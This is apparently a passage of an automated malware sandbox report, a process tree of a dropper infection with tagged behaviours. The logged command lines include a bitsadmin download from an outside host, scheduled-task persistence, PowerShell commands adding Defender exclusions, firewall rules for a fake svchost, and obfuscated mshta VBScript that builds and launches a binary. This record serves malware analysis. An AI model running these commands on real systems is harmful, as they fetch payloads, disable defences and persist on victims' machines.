C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
10⤵
- Download via BitsAdmin
PID:5220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\du2ek3ej.pik\installer.exe /qn CAMPAIGN=654 & exit
8⤵
PID:7540

C:\Users\Admin\AppData\Local\Temp\du2ek3ej.pik\installer.exe
C:\Users\Admin\AppData\Local\Temp\du2ek3ej.pik\installer.exe /qn CAMPAIGN=654
9⤵
PID:7340

C:\Program Files\Common Files\GKJBVASIAX\foldershare.exe
"C:\Program Files\Common Files\GKJBVASIAX\foldershare.exe" /VERYSILENT
7⤵
PID:6152

C:\Users\Admin\Pictures\Adobe Films\T0zgK9XlmcnKX2S7NJcwlC4K.exe
"C:\Users\Admin\Pictures\Adobe Films\T0zgK9XlmcnKX2S7NJcwlC4K.exe"
4⤵
PID:2908

C:\Users\Admin\Pictures\Adobe Films\T0zgK9XlmcnKX2S7NJcwlC4K.exe
"C:\Users\Admin\Pictures\Adobe Films\T0zgK9XlmcnKX2S7NJcwlC4K.exe" -u
5⤵
PID:1524

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2704

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4280

C:\Users\Admin\Pictures\Adobe Films\HfZjSeknn_8lFvezoCMym7zK.exe
"C:\Users\Admin\Pictures\Adobe Films\HfZjSeknn_8lFvezoCMym7zK.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 552
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:2084

C:\Users\Admin\Pictures\Adobe Films\WKhvgPrvsjyiK6AwjSSvsOXl.exe
"C:\Users\Admin\Pictures\Adobe Films\WKhvgPrvsjyiK6AwjSSvsOXl.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1116

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
3⤵
- Executes dropped EXE
PID:3612

C:\Users\Admin\Pictures\Adobe Films\wOvwOyyvUhmeksjM_VgC2z6f.exe
"C:\Users\Admin\Pictures\Adobe Films\wOvwOyyvUhmeksjM_VgC2z6f.exe"
2⤵
- Executes dropped EXE
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 904
3⤵
- Program crash
PID:5472

C:\Users\Admin\Pictures\Adobe Films\15XMBCpxyCxaNEXBZDkFGzMI.exe
"C:\Users\Admin\Pictures\Adobe Films\15XMBCpxyCxaNEXBZDkFGzMI.exe"
2⤵
- Executes dropped EXE
PID:1032

C:\Users\Admin\Pictures\Adobe Films\PhqrYJQomviCIRSWpyIt8dQZ.exe
"C:\Users\Admin\Pictures\Adobe Films\PhqrYJQomviCIRSWpyIt8dQZ.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:688

C:\Users\Admin\Pictures\Adobe Films\C7iwCsv5B0lN4dC1j3Lr_uKB.exe
"C:\Users\Admin\Pictures\Adobe Films\C7iwCsv5B0lN4dC1j3Lr_uKB.exe"
2⤵
- Executes dropped EXE
PID:368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 272
3⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 704
3⤵
- Program crash
PID:4440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 664
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 1128
3⤵
- Program crash
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 688
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 1164
3⤵
- Program crash
PID:6028

C:\Users\Admin\Pictures\Adobe Films\vK6SvNBi5D74H1espDbLP_hA.exe
"C:\Users\Admin\Pictures\Adobe Films\vK6SvNBi5D74H1espDbLP_hA.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:60

C:\Users\Admin\Pictures\Adobe Films\vK6SvNBi5D74H1espDbLP_hA.exe
"C:\Users\Admin\Pictures\Adobe Films\vK6SvNBi5D74H1espDbLP_hA.exe"
3⤵
- Executes dropped EXE
PID:1660

C:\Users\Admin\Pictures\Adobe Films\41becZN7ykRlarMfiT6VFJPv.exe
"C:\Users\Admin\Pictures\Adobe Films\41becZN7ykRlarMfiT6VFJPv.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:2104

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:4028

C:\Users\Admin\Pictures\Adobe Films\9lKjDj4o_xSeel9jjoioM5mK.exe
"C:\Users\Admin\Pictures\Adobe Films\9lKjDj4o_xSeel9jjoioM5mK.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1708

C:\Users\Admin\Pictures\Adobe Films\J7qI7Fchr642VhuD0Cf3cCaR.exe
"C:\Users\Admin\Pictures\Adobe Films\J7qI7Fchr642VhuD0Cf3cCaR.exe"
2⤵
- Executes dropped EXE
PID:3908

C:\Users\Admin\Pictures\Adobe Films\J7qI7Fchr642VhuD0Cf3cCaR.exe
"C:\Users\Admin\Pictures\Adobe Films\J7qI7Fchr642VhuD0Cf3cCaR.exe"
3⤵
PID:8036

C:\Users\Admin\Pictures\Adobe Films\a5aD5wxjRmB9sJpSc45mwwb5.exe
"C:\Users\Admin\Pictures\Adobe Films\a5aD5wxjRmB9sJpSc45mwwb5.exe"
2⤵
- Executes dropped EXE
PID:2160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\a5aD5wxjRmB9sJpSc45mwwb5.exe" & exit
3⤵
PID:5992

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
4⤵
- Delays execution with timeout.exe
PID:5664

C:\Users\Admin\Pictures\Adobe Films\zPgTLoLvPXkHhmuGNwWdg70B.exe
"C:\Users\Admin\Pictures\Adobe Films\zPgTLoLvPXkHhmuGNwWdg70B.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4644

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
3⤵
PID:4748

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4960

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
3⤵
- Creates scheduled task(s)
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
3⤵
PID:4548

C:\Users\Admin\Pictures\Adobe Films\frMqzgLn3vlWWH7PNbBw0x3X.exe
"C:\Users\Admin\Pictures\Adobe Films\frMqzgLn3vlWWH7PNbBw0x3X.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Users\Admin\AppData\Roaming\8341662.exe
"C:\Users\Admin\AppData\Roaming\8341662.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4912

C:\Users\Admin\AppData\Roaming\8380704.exe
"C:\Users\Admin\AppData\Roaming\8380704.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4316

C:\Users\Admin\AppData\Roaming\7606789.exe
"C:\Users\Admin\AppData\Roaming\7606789.exe"
3⤵
- Executes dropped EXE
PID:4132

C:\Users\Admin\AppData\Roaming\7479397.exe
"C:\Users\Admin\AppData\Roaming\7479397.exe"
3⤵
- Executes dropped EXE
PID:3524

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPT: cloSe ( CREatEoBJEct ("WscRIpT.shEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /R TYpE ""C:\Users\Admin\AppData\Roaming\7479397.exe"" > TTQ9VHXCEA.Exe&& sTart TTQ9VHXCeA.EXe -PKSeke3kaX9G~ug5biNU6oIIwdPjLim & if """" =="""" for %x in (""C:\Users\Admin\AppData\Roaming\7479397.exe"" ) do taskkill /IM ""%~Nxx"" -f " , 0, TrUe ))
4⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /R TYpE "C:\Users\Admin\AppData\Roaming\7479397.exe" > TTQ9VHXCEA.Exe&& sTart TTQ9VHXCeA.EXe -PKSeke3kaX9G~ug5biNU6oIIwdPjLim & if "" =="" for %x in ("C:\Users\Admin\AppData\Roaming\7479397.exe") do taskkill /IM "%~Nxx" -f
5⤵
PID:4708

C:\Users\Admin\AppData\Local\Temp\TTQ9VHXCEA.Exe
TTQ9VHXCeA.EXe -PKSeke3kaX9G~ug5biNU6oIIwdPjLim
6⤵
PID:5816

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPT: cloSe ( CREatEoBJEct ("WscRIpT.shEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\TTQ9VHXCEA.Exe"" > TTQ9VHXCEA.Exe&& sTart TTQ9VHXCeA.EXe -PKSeke3kaX9G~ug5biNU6oIIwdPjLim & if ""-PKSeke3kaX9G~ug5biNU6oIIwdPjLim "" =="""" for %x in (""C:\Users\Admin\AppData\Local\Temp\TTQ9VHXCEA.Exe"" ) do taskkill /IM ""%~Nxx"" -f " , 0, TrUe ))
7⤵
PID:6016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /R TYpE "C:\Users\Admin\AppData\Local\Temp\TTQ9VHXCEA.Exe" > TTQ9VHXCEA.Exe&& sTart TTQ9VHXCeA.EXe -PKSeke3kaX9G~ug5biNU6oIIwdPjLim & if "-PKSeke3kaX9G~ug5biNU6oIIwdPjLim " =="" for %x in ("C:\Users\Admin\AppData\Local\Temp\TTQ9VHXCEA.Exe") do taskkill /IM "%~Nxx" -f
8⤵
PID:3824

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: cLosE ( crEAtEoBjEct( "wScrIPT.sHELl" ).rUN ( "cMD.eXE /q/r eCHo C:\Users\Admin\AppData\Local\Temp93RCp> MlPDC.KvU& ECho | SEt /P = ""MZ"" > ZQU~sG1.C3Y& CoPy /y /B ZqU~sG1.c3Y + JBtUq3.g+ CYFQ.WEH+ kDuUN~_B.2V + cULm9SF.X +MlPDC.KvU MgZNwb8K.~& stArt msiexec.exe /Y .\MgZNwB8K.~ " , 0 , TRue ) )
7⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q/r eCHo C:\Users\Admin\AppData\Local\Temp93RCp>MlPDC.KvU& ECho | SEt /P = "MZ" > ZQU~sG1.C3Y&CoPy /y /B ZqU~sG1.c3Y + JBtUq3.g+ CYFQ.WEH+ kDuUN~_B.2V + cULm9SF.X+MlPDC.KvU MgZNwb8K.~& stArt msiexec.exe /Y .\MgZNwB8K.~
8⤵
PID:5132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
9⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>ZQU~sG1.C3Y"
9⤵
PID:5848

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /Y .\MgZNwB8K.~
9⤵
PID:5008

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM "7479397.exe" -f
6⤵
- Kills process with taskkill
PID:5932

C:\Users\Admin\AppData\Roaming\616927.exe
"C:\Users\Admin\AppData\Roaming\616927.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4976

C:\Users\Admin\AppData\Roaming\4389992.exe
"C:\Users\Admin\AppData\Roaming\4389992.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4368

C:\Users\Admin\AppData\Roaming\7017028.exe
"C:\Users\Admin\AppData\Roaming\7017028.exe"
3⤵
- Executes dropped EXE
PID:4300

C:\Users\Admin\Pictures\Adobe Films\8L3PF0_KBJdEapAt_uAiTF2G.exe
"C:\Users\Admin\Pictures\Adobe Films\8L3PF0_KBJdEapAt_uAiTF2G.exe"
2⤵
- Executes dropped EXE
PID:3292

C:\Users\Admin\Pictures\Adobe Films\8L3PF0_KBJdEapAt_uAiTF2G.exe
"C:\Users\Admin\Pictures\Adobe Films\8L3PF0_KBJdEapAt_uAiTF2G.exe"
3⤵
PID:5276

C:\Users\Admin\Pictures\Adobe Films\_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
"C:\Users\Admin\Pictures\Adobe Films\_ZyQ8z7rdOsPsjcNNyxkGs7r.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1232

C:\Users\Admin\Pictures\Adobe Films\iEWrDMBAOeVw6Rt4sYhbIKp2.exe
"C:\Users\Admin\Pictures\Adobe Films\iEWrDMBAOeVw6Rt4sYhbIKp2.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2244

C:\Users\Admin\Pictures\Adobe Films\qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
"C:\Users\Admin\Pictures\Adobe Films\qB8q_Bi7Uq7GFXiNBPr2ALI7.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 552
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:3808

C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe
"C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2512

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
3⤵
PID:4344

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
4⤵
PID:4864

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffa41c6dec0,0x7ffa41c6ded0,0x7ffa41c6dee0
5⤵
PID:3288

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff75bee9e70,0x7ff75bee9e80,0x7ff75bee9e90
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=1824 /prefetch:8
5⤵
PID:4372

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=2088 /prefetch:8
5⤵
PID:4796

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1776 /prefetch:2
5⤵
PID:4720

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2508 /prefetch:1
5⤵
PID:4708

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:1
5⤵
PID:1484

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=3160 /prefetch:8
5⤵
PID:1816

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3264 /prefetch:2
5⤵
PID:5920

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=3820 /prefetch:8
5⤵
PID:6828

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=2052 /prefetch:8
5⤵
PID:6172

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=2132 /prefetch:8
5⤵
PID:6276

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,10436183149154835054,1552879035085201041,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4864_1735462562" --mojo-platform-channel-handle=2676 /prefetch:8
5⤵
PID:6040

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
1⤵
- Executes dropped EXE
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
1⤵
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
1⤵
PID:4924

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
1⤵
PID:4100

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
1⤵
PID:4564

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5296

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:5824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\2373.exe
C:\Users\Admin\AppData\Local\Temp\2373.exe
1⤵
PID:6992

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
2⤵
PID:2072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\7EC3.exe
C:\Users\Admin\AppData\Local\Temp\7EC3.exe
1⤵
PID:6016

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7620

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7912

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 114B1C70373FA3E833C29EB6808656C6 C
2⤵
PID:7716

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C423963DAEA3D7F7002C41BBE0353F69 C
2⤵
PID:7828

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7C3BB5F40E149B9620D5E096A6DFDF87
2⤵
PID:8380

C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
2⤵
PID:6992

C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
3⤵
PID:7312

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--cSExK3QD"
4⤵
PID:7416

C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
